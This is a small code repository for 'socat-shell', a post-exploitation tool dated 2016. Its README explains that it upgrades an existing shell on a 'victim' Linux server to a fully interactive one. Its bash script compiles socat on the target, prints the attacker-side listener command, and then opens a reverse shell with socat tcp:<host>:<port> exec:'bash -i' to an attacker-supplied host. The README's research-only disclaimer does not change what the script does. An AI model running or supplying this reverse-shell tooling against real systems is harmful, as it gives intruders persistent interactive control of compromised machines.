[
  {
    "path": "README.md",
    "content": "# socat-shell\n\nWhen you get a shell on a linux server you get a really limited level of interactivity.\nYou can use socat to establish a fully interactive shell which allows:\n* Tab autocompletion\n* Job management by CTRL+C and CTRL+Z etc\n* Bash history via CTRL+R etc. \nBasically you get bash as if you are SSHed into the target.\n\nIn order to get this goodness you need to:\n* 1) Already have a shell on the victim\n* 2) Have a means of uploading files to the victim\n* 3) Have an established means of communicating to your listener (using TCP).\nThis tool is not going to find any vulnerbilities for you, or confirm egress filtering. \nThis will only be useful in elevating your existing shell to a more functional one.\n\nThe victim must either have \"socat\" installed, or both \"gcc\" and \"make\" so that compilation is possible.\n\nYour listener server must have \"socat\" installed (by default on Kali).\n\nUpload the socat.tar file to your victim, and use your existing shell access to extract that.\nBy executing \"socat-shell.sh\" you will achieve the following:\n* 1) Check for the existence of the \"socat\" binary in the current directory.\n* 2) If it does not find that then it will check for \"gcc\" and \"make\".\n* 3) If those pre-reqs are met, then it will extract the socat source and compile it\n* 4) When successful the binary for \"socat\" will now exist in the current directory. Additionally, the last lines of output will show how to start your listener and how to execute the connection back from the victim.\n\nDislaimer\n\nFor research purposes only, do not use this on any target which you do not have permission to do so.\n"
  },
  {
    "path": "license.txt",
    "content": "Copyright 2016 Paul Ritchie\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n    http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n"
  },
  {
    "path": "socat-shell.sh",
    "content": "#!/bin/bash\n#Copyright 2016 Paul Ritchie\n#\n#Licensed under the Apache License, Version 2.0 (the \"License\");\n#you may not use this file except in compliance with the License.\n#You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n#Unless required by applicable law or agreed to in writing, software\n#distributed under the License is distributed on an \"AS IS\" BASIS,\n#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n#See the License for the specific language governing permissions and\n#limitations under the License.\nif [ -e \"./socat\" ]; then\n\techo \"socat already compiled in current directory\"\n\techo \"moving on to establishing connection\"\nelse\n\techo \"socat NOT compiled in current dir, extracting and compiling\"\n\t# check for gcc and make\n\tif [ -z  `which gcc` ] || [ -z `which make` ]; then\n\t\techo \"Unfortunately gcc or make is not installed\"\n\t\techo \"we won't be able to compile socat on this target today\"\n\t\texit -1\n\tfi\n\t# unpack socak source\n\ttar xf socat-1.7.0.1.tar\n\techo \"Extracted socat to: socat-1.7.3.1\"\n\t# change working directory\n\tcd socat-1.7.0.1\n\techo \"Changed directory to: \" `pwd`\n\t./configure &> ../configure-log.txt # hide the output\n\tmake &> ../make-log.txt # hide the output\n\tif [ -e \"./socat\" ]; then\n\t\techo \"compilation successful, socat found.\"\n\t\tcp socat ../\n\t\tcd ../\n\t\techo \"Changed directory to: \" `pwd`\n\telse\n\t\techo \"$file not found, check log files configure-log.txt & make-log.txt\"\n\t\texit -1\n\tfi\nfi\n\n# if we get here then socat binary has been compiled and we have a copy in this directory\necho \"====================\"\necho \"Start listener on attacker's host:\"\necho \"user@attacker ~: socat -,raw,echo=0 tcp-listen:4545\"\necho \"====================\"\necho \"Run socat from victim to connect back:\"\necho \"user@victim ~: socat tcp:<host>:<port> exec:\\\"bash -i\\\",pty,stderr,setsid,sigint,sane\"\necho \"=====================\"\nif [ -z \"$1\" ] && [ -z \"$2\" ]; then\n\techo \"No arguments provided, please enter the command shown above with host and port\"\n\texit -1\nelse\n\techo \"Attempting to execute against host $1 and port $2\"\n\t./socat tcp:$1:$2 exec:\"bash -i\",pty,stderr,setsid,sigint,sane \nfi\n"
  }
]